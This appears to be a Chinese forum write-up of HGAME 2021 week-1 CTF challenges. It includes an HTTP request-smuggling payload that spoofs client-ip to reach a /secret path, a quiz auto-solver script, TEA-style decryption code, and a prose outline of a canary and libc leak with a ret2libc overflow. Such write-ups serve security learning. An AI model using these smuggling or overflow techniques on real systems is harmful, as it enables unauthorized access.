首页
社区
课程
招聘
3
[原创] 杭电hgame2021 week1 writeup
发表于: 2021-5-27 12:52 14823

[原创] 杭电hgame2021 week1 writeup

2021-5-27 12:52
14823

杭电hgame2021 week1

web

Hitchhiking_in_the_Galaxy

http请求头,按照每一步提示增加项

watermelon

f12在调试器中查看project.js,搜索1999

宝藏走私者

http请求走私

1
2
3
4
5
6
7
8
9
10
11
GET / HTTP/1.1
 
Host: thief.0727.site
 
GET /secret HTTP/1.1
 
Host:thief.0727.site
 
client-ip:127.0.0.1
 
foo:

智商检测机

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
import requests
 
import json
 
from bs4 import BeautifulSoup
 
from sympy import *
 
 
numArr = ["0","1","2","3","4","5","6","7","8","9","-","+"]
 
 
def scan(str1):
 
    newStr = ""
 
    for x in range(0,len(str1)):
 
        if str1[x] in numArr:
 
            newStr += str1[x]
 
    return newStr
 
 
def getQ(session="session=eyJzb2x2aW5nIjoxfQ.YBfJbQ.L2PH1NyDzVTQcjiJjLR5lqeU4cw"):
 
    headers = {"Cookie":session}
 
    res = requests.get(url="http://r4u.top:5000/api/getQuestion",headers=headers)
 
    return json.loads(res.text)
 
 
#q = getQ()
 
 
def anaylaze(q):
 
    q = q['question']
 
    soup = BeautifulSoup(q,"lxml")
 
    xiaxian = soup.msubsup.mo.next_sibling
 
    shangxian = soup.msubsup.mo.next_sibling.next_sibling
 
    a = soup.math.mn
 
    a = a.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element
 
    b = soup.math.mn.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element
 
    fuhao = soup.math.mn.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element
 
    return [int(scan(str(xiaxian))),int(scan(str(shangxian))),int(scan(str(a))),scan(str(fuhao)),int(scan(str(b)))]
 
 
#print(anaylaze(q))
 
 
def calc(arr):
 
    print(arr)
 
    x = symbols('x')
 
    if arr[3] == "+":
 
        answer = integrate(arr[2]*x+arr[4], (x, arr[0], arr[1]))
 
    else:
 
        answer = integrate(arr[2]*x-arr[4], (x, arr[0], arr[1]))
 
 
 
    return(round(answer,2))
 
 
#answer = calc(anaylaze(q))
 
 
def submit(answer,cookie="session=eyJzb2x2aW5nIjoxfQ.YBfJbQ.L2PH1NyDzVTQcjiJjLR5lqeU4cw"):
 
 
 
    data = '{"answer":'+str(answer)+'}'
 
    print(data)
 
    headers = {"Cookie":cookie,"Content-Type":"application/json;charset=UTF-8"}
 
    res = requests.post(url="http://r4u.top:5000/api/verify",data=data,headers=headers)
 
    print(res.text)
 
    newCookie = res.headers['Set-Cookie']
 
    print(newCookie)
 
    return newCookie
 
 
#submit(answer)
 
 
def run(cookie):
 
    q = getQ(cookie)
 
    answer = calc(anaylaze(q))
 
    cookie = submit(answer,cookie)
 
    run(cookie)
 
 
run("session=eyJzb2x2aW5nIjozfQ.YBfbuQ.R7aqFFYJmRgJ7FITfhRqfCKPNCg")

走私者的愤怒

和宝藏走私者一样的考点

re

apacha

图片.png

 

主要加密流程如上,写出正向代码,然后对着逆

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
v6l = [ 0x9E3779B9 , 0x3C6EF372, 0xDAA66D2B, 0x78DDE6E4, 0x1715609D, 0xB54CDA56, 0x5384540F]
v7l = [ 0x278DDE6E , 0xF1BBCDC, 0x36A99B4A, 0x1E3779B9, 0x5C55827, 0x2D533695, 0x14E11503]
key = [1, 2, 3, 4]
flag = [0xE74EB323, 0xB7A72836, 0x59CA6FE2, 0x967CC5C1, 0xE7802674, 0x3D2D54E6, 0x8A9D0356, 0x99DCC39C, 0x7026D8ED, 0x6A33FDAD, 0xF496550A, 0x5C9C6F9E, 0x1BE5D04C, 0x6723AE17, 0x5270A5C2, 0xAC42130A, 0x84BE67B2, 0x705CC779, 0x5C513D98, 0xFB36DA2D, 0x22179645, 0x5CE3529D, 0xD189E1FB, 0xE85BD489, 0x73C8D11F, 0x54B5C196, 0xB67CB490, 0x2117E4CA, 0x9DE3F994, 0x2F5AA1AA, 0xA7E801FD, 0xC30D6EAB, 0x1BADDC9C, 0x3453B04A, 0x92A406F9]
 
 
'''   正向加密代码
flag = b'hgame{aaaaaaaaaaaaaaaaaaaaaaaaaaaa}'
flag = list(flag)
v5 = flag[34]
for i in range(7):
    for j in range(34):
        v5 = flag[j] + ((((v5 >> 5) ^ (4 * flag[j + 1])) + ((16 * v5) ^ (flag[j + 1] >> 3))) ^ ((key[ (j ^ v7l[i] ) & 3 ] ^ v5) + (flag[j + 1] ^ v6l[i])))
        v5 &= 0xffffffff
        flag[j] = v5
 
    v5 = flag[34] + (((key[(34 ^ v7l[i]) & 3] ^ v5) + (flag[0] ^ v6l[i])) ^ (((4 * flag[0]) ^ (v5 >> 5)) + (((16 * v5) ^ (flag[0] >> 3))&0xffffffff)))
    v5 &= 0xffffffff
    flag[34] = v5
'''
 
for x in range(7):
 
    i = 6 - x
    v5 = flag[34]
    flag[34] = v5 - ((((key[(34 ^ v7l[i]) & 3] ^ flag[33]) + (flag[0] ^ v6l[i])) ^ (((4 * flag[0]) ^ (flag[33] >> 5)) + ((16 * flag[33]) ^ (flag[0] >> 3))))&0xffffffff)
    flag[34]&=0xffffffff
    for y in range(34):
        j = 33 - y
        v5 = flag[j]
        flag[j] = v5 - (((((flag[j-1] >> 5) ^ (4 * flag[j + 1])) + ((16 * flag[j-1]) ^ (flag[j + 1] >> 3))) ^ ((key[ (j ^ v7l[i] ) & 3 ] ^ flag[j-1]) + (flag[j + 1] ^ v6l[i])))&0xffffffff)
        flag[j]&=0xffffffff
        if(j==0):
            flag[j] = v5 - (((((flag[34] >> 5) ^ (4 * flag[j + 1])) + ((16 * flag[34]) ^ (flag[j + 1] >> 3))) ^ ((key[ (j ^ v7l[i] ) & 3 ] ^ flag[34]) + (flag[j + 1] ^ v6l[i])))&0xffffffff)
            flag[j]&=0xffffffff
 
print(bytes(flag))

HelloRe

签到题,就是一个异或

pypy

简单的python字节码,对照官方文档写出源码,然后逆

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
raw_flag = ''
 
cipher = list((raw_flag[6:-1]))
 
length = len(cipher)
 
for i in range(length//2):
    cipher[2*i],cipher[2*i+1] = cipher[2*i+1],cipher[2*i]
 
res=[]
 
for i in range(length):
    res.append(ord(cipher[i])^i)
 
res = bytes(res).hex()
 
res = b'30466633346f59213b4139794520572b45514d61583151576638643a'

pwn

这几道pwn题都非常有意思,虽然考的都是栈溢出、格式化字符串,但是都有一些有趣的细节

whitegive

签到题,输入的是数字,要和一个字符串比较,相等就返回shell

 

通过调试发现字符串参与比较的其实是它的内存地址

 

那么我们直接输入这个地址就get shell了

SteinsGate2

week1压轴题,截至目前只有七解

 

保护全开

 

首先是要读源码,然后可以发现一个泄露点和一个溢出点和一处格式化字符串漏洞点

 

其中泄露点虽然不能溢出,但是可以由于printf的\x00才截断的性质,泄露出libc基址,然后调试的时候我们还发现,除了[rbp-0x8]处是canary的值,在栈中还残留着之前函数的canary值,由于canary在一次运行中都一样,所以我们也可以得到canary的值

 

溢出点就是栈溢出覆盖返回地址,ret2libc

 

这里的格式化字符串漏洞是个坑点,虽然存在,但经过反复调试发现触发它的条件永远不可能满足,浪费了我好多时间

 

泄露点+溢出点就可以打通了

 

然后还是要读源码,得到触发各个漏洞点的条件,也就是第几天要做固定的事

 

总体流程就是:

 

首先输入的世界线变化率要与初始世界线变化率的差值小于0.000001,这样我们就满足了 know_true


[招生]科锐逆向工程师培训(2025年3月11日实地,远程教学同时开班, 第52期)!

收藏
免费 3
支持
分享
赞赏记录
参与人
雪币
留言
时间
PLEBFE
为你点赞~
2023-1-13 03:24
Youlor
为你点赞~
2022-7-17 11:40
SYJ-Re
为你点赞~
2021-5-27 18:22
最新回复 (0)
游客
登录 | 注册 方可回帖
返回

账号登录
验证码登录

忘记密码?
没有账号?立即免费注册